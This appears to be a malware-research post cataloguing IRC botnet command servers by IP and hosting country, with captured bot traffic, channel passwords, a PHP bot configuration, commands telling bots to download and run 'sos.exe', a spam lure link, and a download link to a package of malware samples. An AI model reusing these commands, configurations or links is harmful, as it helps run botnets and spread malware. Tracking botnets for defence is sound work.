92.241.165.156(irc botnet hosted in Russian Federation 2×4.ru Network)

Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 63.135.80.46 80 69.171.224.13 80 92.241.165.156 1234 PASS xxx NICK NEW-[USA|00|P|64628] USER XP-8137 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|64628] -ix JOIN #!nw! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/92.241.165.156

28 mb executable samples

this package is around 28mb of diferent malwares have fun searching inside Download: http://8c75276e.goneviral.com

196.212.26.149(linux botnet hosted in South Africa Cape Town Afrinic)

var $config = array(“server”=>”196.212.26.149”, “port”=>6667, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#botovi”, “key”=>”123456”, // “modes”=>”-x+i”, “password”=>”botko”, // “trigger”=>”!say@”, “hostauth”=>”*” // * infos about hosting: http://whois.domaintools.com/196.212.26.149

72.55.132.187(irc botnet hosted in Canada Zenkis.ca)

Remote Host Port Number 213.251.170.52 80 72.55.132.187 2603 PASS ngrBot NICK n{US|XPa}pszjwcb USER pszjwcb 0 0 :pszjwcb JOIN #phcrulez ngrBot * Now talking in #phcrulez * Topic is ” * Set by Ko0l on Mon Apr 11 01:39:26 infos about hosting: http://whois.domaintools.com/72.55.132.187

125.22.97.146(irc botnet hosted in India Bangalore Madura Coats)

server: 125.22.97.146:6667 Current Local Users: 64 Max: 167 Current Global Users: 64 Max: 167 chanel: #sos# * Now talking in #sos# * Topic is ‘@download https://rs461l32.rapidshare.com/files/459011368/sos.exe 1, ‘ * Set by ^Crash^ on Mon Apr 25 17:41:45

abc.radiozeri.de(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Dns resolved abc.radiozeri.de to 61.31.99.67 ircd: 61.31.99.67:81 chanel: #sos# * Now talking in #sos# * Topic is ” * Set by mofo on Mon Apr 25 14:58:51 .s /99/106/112/81/55/59/40/104/113/121/35/102/121/51/113/98/117/109/126/122/102/124/38/86/75/119/107/117/121/58/43/62/48/55/51/16/48/50/ mx (r00t@bossman) Quit (Ping timeout) UPDATE: Remote Host Port Number 195.122.131.7 80 213.251.170.52 80 59.76.142.100 4042 PASS ngrBot JOIN #US JOIN #new PRIVMSG #boss :[d=”http://rapidshare.com/files/460738009/sos.exe”] Error

115.146.19.158(irc botnet hosted in Japan Tokyo Kddi Web Communications Inc)

Remote Host Port Number 115.146.19.158 4042 PASS ngrBot 213.251.170.52 80 JOIN #US NICK n{US|XPa}iqwtaan USER iqwtaan 0 0 :iqwtaan JOIN #boss ngrBot PRIVMSG #boss :[HTTP]: Updated HTTP spread interval to “6” PRIVMSG #boss :[HTTP]: Updated HTTP spread message to “wow album 🙂 http://tiny.cc/facebook-photos-24042011” PRIVMSG #boss :[MSN]: Updated MSN spread interval to “6” PRIVMSG #boss :[MSN]: